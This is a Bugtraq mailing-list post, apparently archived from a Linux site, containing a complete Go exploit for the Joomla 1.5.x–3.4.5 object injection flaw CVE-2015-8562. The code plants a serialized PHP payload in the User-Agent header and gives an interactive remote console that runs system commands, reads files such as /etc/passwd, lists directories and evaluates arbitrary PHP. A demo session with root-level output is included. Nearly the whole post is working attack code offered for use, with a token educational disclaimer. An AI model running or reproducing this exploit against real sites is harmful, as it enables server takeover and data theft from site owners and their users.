Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)

From: irancrash@gmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)
Date:


package main

/*
**************************************************************************
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**************************************************************************
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE
*                     IS ON YOUR OWN RESPONSIBILITY
**************************************************************************
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**************************************************************************
* DEMO :

$ ./exploit 192.168.1.113/joomla
###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###############################################

Attacking to  http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH                       read file from FILEPATH
dir DIRPATH                 list directory in DIRPATH
exec COMMAND                      execute system command
eval phpcode                 evaluate PHP Code
help                              display this help
exit                              close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')


root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$

 */

import (
     "fmt"
    "net/http"
       "regexp"
 "os"
     "io/ioutil"
      "bytes"
  "net/http/cookiejar"
     "net/url"
        "bufio"
  "strings"
)


var target string;


var helpString=`# Command Line Documentation :
read FILEPATH                       read file from FILEPATH
dir DIRPATH                 list directory in DIRPATH
exec COMMAND                      execute system command
eval phpcode                 evaluate PHP Code
help                              display this help
exit                              close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')

`

var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")

var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")

var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")

var newLine=regexp.MustCompile("[\\n\\r]")

var client *http.Client

func newRequest(command string) *http.Request{
      values:=url.Values{}
       values.Set("1","echo('iMH3r3=');"+command+";")

        req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))

      if err!=nil{
               panic(err)
 }

     req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
   req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
    return req
}


func escape(str string) string{
     return strings.Replace(str,"'","\\'",-1)
}


func runCommand(command string){
        res,err:=client.Do(newRequest(command))

       if err!=nil{
               fmt.Println(err.Error())
   }else{
             defer res.Body.Close()
             resBytes,err:=ioutil.ReadAll(res.Body)
             str:=string(resBytes)

         if err!=nil{
                       fmt.Println(err)
           }
          match:=resultRegex.FindStringSubmatch(str)
         if len(match)>0{
                      fmt.Print(match[0][7:])
            }
  }

}


func confirm() bool{
    res,err:=client.Do(newRequest(""))

  if err!=nil{
               fmt.Println(err)
           return false
       }else{
             if res.StatusCode==500{
                    fmt.Println("Patched PHP Version :( !")
                  return false
               }
          defer res.Body.Close()
             resBytes,err:=ioutil.ReadAll(res.Body)
             str:=string(resBytes)

         if err!=nil{
                       fmt.Println(err)
           }
          match:=resultRegex.FindStringSubmatch(str)
         if len(match)>0{
                      return true
                }else{
                     return false
               }
  }
}

func main(){
      fmt.Print(`###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`)
      options := cookiejar.Options{}

        jar, err := cookiejar.New(&options)
   if err != nil {
            panic(err)
 }

     client = &http.Client{
                Jar:jar,
   }



   if len(os.Args)<2{
            fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
          return
     }

     target=os.Args[1]
  if(!validHttpUrl.MatchString(target)){
             target="http://"+target
  }

     if string(target[len(target)-1])!="/"{
           target+="/"
      }

     fmt.Println("Attacking to ",target)


    res,err:=client.Do(newRequest(""))
       if err!=nil{
               fmt.Println("Request Error:",err)
                return
     }
  ioutil.ReadAll(res.Body)
   res.Body.Close()

      if confirm(){
              fmt.Println("Target is vulnerable !")
            //runCommand("system('ls -la')")
               stdinreader := bufio.NewReader(os.Stdin)

              fmt.Println(helpString)
            for {
                      var line string
                    fmt.Print("root@joomla:$ ")
                      line,_=stdinreader.ReadString('\n')
                      line=newLine.ReplaceAllString(line,"")
                   match:=cmdRegex.FindStringSubmatch(line)
                   if len(match)<3 {
                             if (line=="exit"){
                                       return
                             }

                             if !(line=="help"){
                                      fmt.Println("Wrong input !")
                             }

                             fmt.Println(helpString)
                    }else{
                             cmd:=match[1]
                              input:=escape(match[2])
                            switch cmd {
                               case "exec":
                                     runCommand("system('"+input+"')")
                            case "read":
                                     runCommand("readfile('"+input+"')")
                          case "dir":
                                      runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}")
                          case "eval":
                                     runCommand(match[2])
                               }
                  }
          }
  }else{
             fmt.Println("Target is not vulnerable!")
 }


}





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.